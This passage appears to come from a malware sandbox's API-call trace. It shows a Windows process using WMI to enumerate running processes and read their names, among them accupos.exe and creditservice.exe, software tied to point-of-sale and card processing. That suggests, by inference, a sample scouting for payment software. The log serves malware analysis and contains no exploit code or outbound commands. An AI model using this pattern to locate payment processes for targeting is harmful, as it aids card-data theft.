(bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2072\"") returned 0x66 [0214.611] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.611] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.611] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.611] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.612] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5631fa8) returned 0x0 [0214.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631fa8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.612] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5631fa8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5631118) returned 0x0 [0214.612] WbemDefPath:IUnknown:Release (This=0x5631fa8) returned 0x0 [0214.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631118, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5631118) returned 0x0 [0214.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631118, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.612] WbemDefPath:IUnknown:AddRef (This=0x5631118) returned 0x3 [0214.613] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631118, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.613] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631118, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.613] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631118, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5631fb8) returned 0x0 [0214.613] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5631fb8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.613] WbemDefPath:IUnknown:Release (This=0x5631fb8) returned 0x3 [0214.613] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.613] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.613] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631118, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.613] WbemDefPath:IUnknown:Release (This=0x5631118) returned 0x2 [0214.613] WbemDefPath:IUnknown:Release (This=0x5631118) returned 0x1 [0214.613] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.613] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.613] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631118, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5631118) returned 0x0 [0214.613] WbemDefPath:IUnknown:AddRef (This=0x5631118) returned 0x3 [0214.613] WbemDefPath:IUnknown:Release (This=0x5631118) returned 0x2 [0214.613] WbemDefPath:IWbemPath:SetText (This=0x5631118, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2072\"") returned 0x0 [0214.613] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.613] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.613] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.613] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.613] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.613] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.614] IWbemClassObject:Get (in: This=0x562f1f0, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2694394*=0, plFlavor=0x2694398*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="accupos.exe", varVal2=0x0), pType=0x2694394*=8, plFlavor=0x2694398*=0) returned 0x0 [0214.614] SysStringByteLen (bstr="accupos.exe") returned 0x16 [0214.614] SysStringByteLen (bstr="accupos.exe") returned 0x16 [0214.614] IWbemClassObject:Get (in: This=0x562f1f0, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2694394*=8, plFlavor=0x2694398*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="accupos.exe", varVal2=0x0), pType=0x2694394*=8, plFlavor=0x2694398*=0) returned 0x0 [0214.614] SysStringByteLen (bstr="accupos.exe") returned 0x16 [0214.614] SysStringByteLen (bstr="accupos.exe") returned 0x16 [0214.614] CoTaskMemAlloc (cb=0x4) returned 0x5631fe8 [0214.614] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5631fe8, puReturned=0x267acc0 | out: apObjects=0x5631fe8*=0x562f388, puReturned=0x267acc0*=0x1) returned 0x0 [0214.615] IUnknown:QueryInterface (in: This=0x562f388, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x562f388) returned 0x0 [0214.615] IUnknown:QueryInterface (in: This=0x562f388, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.615] IUnknown:QueryInterface (in: This=0x562f388, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.615] IUnknown:AddRef (This=0x562f388) returned 0x3 [0214.615] IUnknown:QueryInterface (in: This=0x562f388, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.615] IUnknown:QueryInterface (in: This=0x562f388, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.615] IUnknown:QueryInterface (in: This=0x562f388, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x562f38c) returned 0x0 [0214.615] IMarshal:GetUnmarshalClass (in: This=0x562f38c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.615] IUnknown:Release (This=0x562f38c) returned 0x3 [0214.615] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.615] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.616] IUnknown:QueryInterface (in: This=0x562f388, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.616] IUnknown:Release (This=0x562f388) returned 0x2 [0214.616] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.616] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.616] IUnknown:QueryInterface (in: This=0x562f388, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x562f388) returned 0x0 [0214.616] IUnknown:AddRef (This=0x562f388) returned 0x4 [0214.616] IUnknown:Release (This=0x562f388) returned 0x3 [0214.616] IUnknown:Release (This=0x562f388) returned 0x2 [0214.616] CoTaskMemFree (pv=0x5631fe8) [0214.616] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.616] IUnknown:AddRef (This=0x562f388) returned 0x3 [0214.616] IWbemClassObject:Get (in: This=0x562f388, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.616] IWbemClassObject:Get (in: This=0x562f388, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2080\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.616] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2080\"") returned 0x66 [0214.617] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2080\"") returned 0x66 [0214.617] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.617] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.617] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.617] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.618] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5631fe8) returned 0x0 [0214.618] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631fe8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.618] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5631fe8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x56311f8) returned 0x0 [0214.618] WbemDefPath:IUnknown:Release (This=0x5631fe8) returned 0x0 [0214.618] WbemDefPath:IUnknown:QueryInterface (in: This=0x56311f8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x56311f8) returned 0x0 [0214.618] WbemDefPath:IUnknown:QueryInterface (in: This=0x56311f8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.618] WbemDefPath:IUnknown:AddRef (This=0x56311f8) returned 0x3 [0214.618] WbemDefPath:IUnknown:QueryInterface (in: This=0x56311f8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.619] WbemDefPath:IUnknown:QueryInterface (in: This=0x56311f8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.619] WbemDefPath:IUnknown:QueryInterface (in: This=0x56311f8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5631ff8) returned 0x0 [0214.619] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5631ff8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.619] WbemDefPath:IUnknown:Release (This=0x5631ff8) returned 0x3 [0214.619] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.619] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.619] WbemDefPath:IUnknown:QueryInterface (in: This=0x56311f8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.619] WbemDefPath:IUnknown:Release (This=0x56311f8) returned 0x2 [0214.619] WbemDefPath:IUnknown:Release (This=0x56311f8) returned 0x1 [0214.619] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.619] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.619] WbemDefPath:IUnknown:QueryInterface (in: This=0x56311f8, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x56311f8) returned 0x0 [0214.619] WbemDefPath:IUnknown:AddRef (This=0x56311f8) returned 0x3 [0214.619] WbemDefPath:IUnknown:Release (This=0x56311f8) returned 0x2 [0214.619] WbemDefPath:IWbemPath:SetText (This=0x56311f8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2080\"") returned 0x0 [0214.619] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.619] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.619] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.619] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.619] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.619] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.619] IWbemClassObject:Get (in: This=0x562f388, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2694c0c*=0, plFlavor=0x2694c10*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="creditservice.exe", varVal2=0x0), pType=0x2694c0c*=8, plFlavor=0x2694c10*=0) returned 0x0 [0214.619] SysStringByteLen (bstr="creditservice.exe") returned 0x22 [0214.620] SysStringByteLen (bstr="creditservice.exe") returned 0x22 [0214.620] IWbemClassObject:Get (in: This=0x562f388, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2694c0c*=8, plFlavor=0x2694c10*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="creditservice.exe", varVal2=0x0), pType=0x2694c0c*=8, plFlavor=0x2694c10*=0) returned 0x0 [0214.620] SysStringByteLen (bstr="creditservice.exe") returned 0x22 [0214.620] SysStringByteLen (bstr="creditservice.exe") returned 0x22 [0214.620] CoTaskMemAlloc (cb=0x4) returned 0x5632028 [0214.620] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5632028, puReturned=0x267acc0 | out: apObjects=0x5632028*=0x562f520, puReturned=0x267acc0*=0x1) returned 0x0 [0214.621] IUnknown:QueryInterface (in: This=0x562f520, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x562f520) returned 0x0 [0214.621] IUnknown:QueryInterface (in: This=0x562f520, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.621] IUnknown:QueryInterface (in: This=0x562f520, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.621] IUnknown:AddRef (This=0x562f520) returned 0x3 [0214.621] IUnknown:QueryInterface (in: This=0x562f520, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.621] IUnknown:QueryInterface (in: This=0x562f520, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.621] IUnknown:QueryInterface (in: This=0x562f520, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x562f524) returned 0x0 [0214.621] IMarshal:GetUnmarshalClass (in: This=0x562f524, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.621] IUnknown:Release (This=0x562f524) returned 0x3 [0214.622] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.622] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.622] IUnknown:QueryInterface (in: This=0x562f520, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.622] IUnknown:Release (This=0x562f520) returned 0x2 [0214.622] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.622] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.622] IUnknown:QueryInterface (in: This=0x562f520, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x562f520) returned 0x0 [0214.622] IUnknown:AddRef (This=0x562f520) returned 0x4 [0214.622] IUnknown:Release (This=0x562f520) returned 0x3 [0214.622] IUnknown:Release (This=0x562f520) returned 0x2 [0214.622] CoTaskMemFree (pv=0x5632028) [0214.622] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.622] IUnknown:AddRef (This=0x562f520) returned 0x3 [0214.622] IWbemClassObject:Get (in: This=0x562f520, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, 